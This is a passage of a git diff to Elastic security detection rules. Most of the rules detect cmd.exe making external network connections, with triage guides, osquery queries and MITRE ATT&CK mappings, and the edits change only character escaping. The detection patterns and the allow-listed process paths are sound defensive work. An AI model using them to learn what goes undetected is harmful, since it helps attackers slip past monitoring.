Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.backend.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files\\\\Oracle\\\\VirtualBox\\\\VirtualBoxVM.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files\\\\Silverfort\\\\Silverfort AD Adapter\\\\SilverfortServer.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files (x86)\\\\SAP BusinessObjects\\\\tomcat\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program 
Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\vmnat.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"System\"\n ) and process.code_signature.trusted == true\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_102.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_102.json
index 22a6d37e93d..f7e84f34749 100644
--- a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_102.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_103.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_103.json
index c19c74fa754..8925f94a34a 100644
--- a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_103.json
@@ -16,7 +16,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Command Prompt Network Connection",
- "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"cmd.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"cmd.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_104.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_104.json
index 7edcee49fd9..df213d4339f 100644
--- a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_104.json 
@@ -16,7 +16,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Command Prompt Network Connection",
- "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"cmd.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"cmd.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_105.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_105.json
index 6411a79686e..86278b2d92b 100644
--- a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_105.json 
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Command Prompt Network Connection", - "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM 